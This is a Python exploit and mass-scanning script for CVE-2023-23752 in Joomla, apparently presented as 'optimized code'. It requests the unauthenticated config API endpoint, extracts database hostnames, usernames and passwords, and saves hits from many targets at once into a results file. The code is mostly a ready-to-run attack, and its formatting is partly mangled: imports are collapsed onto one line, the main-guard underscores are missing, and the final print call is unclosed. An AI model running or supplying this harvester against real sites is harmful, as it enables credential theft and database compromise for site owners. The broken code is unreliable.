以下是优化后的代码：

Author: Pari Malam

import requests import sys import os import re import colorama import urllib3 from sys import stdout from colorama import Fore, Style, Back, init from concurrent.futures import ThreadPoolExecutor, as_completed

init(autoreset=True) delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if not os.path.exists('Results'): os.mkdir('Results')

def banners(): os.system('clear' if os.name == 'posix' else 'cls') print(f"{Fore.YELLOW}[CVE-2023-23752] - {Fore.GREEN}Authentication Bypass Information Leak on Joomla!")

banners()

def scan_single_url(url=None): if url is None: url = input(f"\n{Fore.YELLOW}IP/Domain: {Fore.RESET}")

if not url.startswith('https://') and not url.startswith('http://'):
    full_url = 'http://' + url
else:
    full_url = url

print(f"\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]")
try:
    headers = {
        "Host": url,
        "content-type": "application/vnd.api+json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
    }
    response = requests.get(full_url, headers=headers, verify=False, timeout=10)
    config_url = full_url + '/api/index.php/v1/config/application?public=true' #/api/index.php/v1/users?public=true
    config_response = requests.get(config_url, verify=False)
    if config_response.status_code == 200 and b'dbtype' in config_response.content:
        decoded_content = config_response.content.decode()
        if 'dbtype' in decoded_content:
            dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0]
            dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0]
            host = re.findall('"host":"(.*?)"', decoded_content)[0]
            db = re.findall('"db":"(.*?)"', decoded_content)[0]
            user = re.findall('"user":"(.*?)"', decoded_content)[0]
            password = re.findall('"password":"(.*?)"', decoded_content)[0]

            print(f"{Fore.YELLOW}\n[+] Domain            : {Fore.GREEN}{url}")
            print(f"{Fore.YELLOW}[+] Database Type     : {Fore.GREEN}{dbtype}")
            print(f"{Fore.YELLOW}[+] Database Prefix   : {Fore.GREEN}{dbprefix}")
            print(f"{Fore.YELLOW}[+] Database          : {Fore.GREEN}{db}")
            print(f"{Fore.YELLOW}[+] Hostname          : {Fore.GREEN}{host}")
            print(f"{Fore.YELLOW}[+] Username          : {Fore.GREEN}{user}")
            print(f"{Fore.YELLOW}[+] Password          : {Fore.GREEN}{password}\n")
            
            if host != "localhost" and host != "127.0.0.1":
                with open('Results/live.txt', 'a') as f:
                    f.write(f"[+] {url}\nDatabase Type     : {dbtype}\nDatabase Prefix   : {dbprefix}\nHostname          : {host}\nDatabase          : {db}\nUsername          : {user}\nPassword          : {password}\n\n")

            return decoded_content, True
except Exception as e:
    print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Failed!]")

return '', False

def scan_multiple_urls(): url_list = input(f"\n{Fore.RED}[+] {Fore.YELLOW}IP/DOMAIN List: {Fore.RESET}") urls = []

if not os.path.exists("Results"):
    os.makedirs("Results")
    
with open(url_list, "r") as f:
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = []
        for url in f:
            url = url.strip()
            if not url.startswith('https://') and not url.startswith('http://'):
                url = 'http://' + url

            if re.match(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", url):
                url_file_name = f"Results/IPs_{url}.txt"
            else:
                url_file_name = re.sub(r"https?://", "", url).rstrip("/") + ".txt"

            url_file_path = f"Results/{url_file_name}"
            futures.append(executor.submit(scan_single_url, url.strip()))

            urls.append(url)

        for future in as_completed(futures):
            response, sensitive_matches = future.result()
            if sensitive_matches:
                decoded_content = response
                dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0]
                dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0]
                host = re.findall('"host":"(.*?)"', decoded_content)[0]
                db = re.findall('"db":"(.*?)"', decoded_content)[0]
                user = re.findall('"user":"(.*?)"', decoded_content)[0]
                password = re.findall('"password":"(.*?)"', decoded_content)[0]
                
                if host != "localhost" and host != "127.0.0.1":
                    with open('Results/live.txt', 'a') as f:
                        f.write(f"[+] {url}\nDatabase Type     : {dbtype}\nDatabase Prefix   : {dbprefix}\nHostname          : {host}\nDatabase          : {db}\nUsername          : {user}\nPassword          : {password}\n\n")

                    with open(url_file_path, "w", encoding="utf-8") as f:
                        f.write(decoded_content)
            elif response:
                print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]")
            else:
                print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Error!]")
        
return urls

if name == 'main': choice = input(f"\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}") if choice == '1': response, sensitive_matches = scan_single_url() elif choice == '2': scan_multiple_urls() else: print(f"\n{Fore.RED}Invalid option selected"